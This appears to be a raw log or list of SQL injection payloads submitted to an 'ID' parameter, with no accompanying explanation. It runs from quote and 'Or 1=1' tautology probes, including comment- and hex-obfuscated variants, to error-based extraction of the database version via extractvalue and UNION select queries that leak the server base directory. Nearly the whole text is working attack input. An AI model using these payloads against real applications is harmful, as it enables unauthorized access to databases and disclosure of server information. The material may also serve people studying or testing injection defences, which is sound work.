ID:1
ID:1
ID:2
ID:3
ID:4
ID:1'
ID:1' and 1=1 
ID:1' 
ID:1' And 1=1 
ID:1' Or 1=1 
ID:1' 4f72 1=1 
ID:1' 4f 72 1=1 
ID:1' Or 1=1 
ID:1' /*Or*/ 1=1 
ID:1' 
ID:1' 
ID:1' || 1=1 
ID:1' || 1=1 -- 
ID:1' || 1=1 -- 
ID:1' || 1=1 
ID:1' || 1=1 #
ID:1' Or 1=1 #
ID:1' 
ID:1' 
ID:1' 
ID:1' 
ID:1' 
ID:1' 
ID:1' 
ID:1' || 1=1 #
ID:1' 
ID:1'
ID:1'
ID:1
ID:1
ID:1'
ID:1' || 1=1 #
ID:1' || 1=1 #
ID:1' 
ID:1
ID:1
ID:7
ID:7
ID:1
ID:1
ID:1
ID:1' || extractvalue(1,concat(0x7e,(select @@version),0x7e)) #
ID:1' || extractvalue(1,concat(0x7e,(select @@version),0x7e)) #
ID:1' || extractvalue(1,concat(0x7e,(select @@version),0x7e)) #
ID:1' || extractvalue(1,concat(0x7e,(select @@version),0x7e)) #
ID:1' || extractvalue(1,concat(0x7e,(select @@version),0x7e)) #
ID:1' || extractvalue(1,concat(0x7e,(select @@version),0x7e)) #
ID:1' || extractvalue(1,concat(0x7e,(select @@version),0x7e)) #
ID:1' || extractvalue(1,concat(0x7e,(select @@version),0x7e)) #
ID:1' and 1=1' || extractvalue(1,concat(0x7e,(select @@version),0x7e)) #
ID:1' and 1=1' || extractvalue(1,concat(0x7e,(select @@version),0x7e)) #
ID:1' and 1=1' || extractvalue(1,concat(0x7e,(select @@version),0x7e)) #
ID:1' and 1=1' || extractvalue(1,concat(0x7e,(select @@version),0x7e)) #
ID:1' and 1=1' || extractvalue(1,concat(0x7e,(select @@version),0x7e)) #
ID:1' and 1=1' || extractvalue(1,concat(0x7e,(select @@version),0x7e)) #
ID:1' and 1=1' || extractvalue(1,concat(0x7e,(select @@version),0x7e)) #
ID:1' and 1=1' || extractvalue(1,concat(0x7e,(select @@version),0x7e)) #
ID:1' and 1=1' || extractvalue(1,concat(0x7e,(select @@version),0x7e)) #
ID:1' and 1=1' || extractvalue(1,concat(0x7e,(select @@version),0x7e)) #
ID:1' and 1=1' || extractvalue(1,concat(0x7e,(select @@version),0x7e)) #
ID:1' and 1=1' || extractvalue(1,concat(0x7e,(select @@version),0x7e)) #
ID:1' and 1=1' || extractvalue(1,concat(0x7e,(select @@version),0x7e)) #
ID:1' and 1=1' || extractvalue(1,concat(0x7e,(select @@version),0x7e)) #
ID:1' and 1=1' || extractvalue(1,concat(0x7e,(select @@version),0x7e)) #
ID:1'  || extractvalue(1,concat(0x7e,(select @@version),0x7e)) #
ID:1'  || extractvalue(1,concat(0x7e,(select @@version),0x7e)) #
ID:1'  || extractvalue(1,concat(0x7e,(select @@version),0x7e)) #
ID:1'  || extractvalue(1,concat(0x7e,(select @@version),0x7e)) #
ID:-1 UNION select 1,@@basedir,3
ID:-1 UNION select 1,@@basedir,3
ID:-1' UNION select 1,@@basedir,3
ID:-1' UNION select 1,@@basedir,3
ID:1' UNION select 1,@@basedir,3
ID:1' UNION select 1,@@basedir,3#
ID:-1' UNION select 1,@@basedir,3#
ID:-1' UNION select 1,@@basedir,3#
ID:-1' UNION select 1,@@basedir,3 #
ID:-1' UNION select 1,@@basedir,3 #
ID:-1' UNION select 1,@@basedir,3 #
ID:-1' UNION select 1,@@basedir,3 #
ID:-1' UNION select 1,@@basedir,3 #
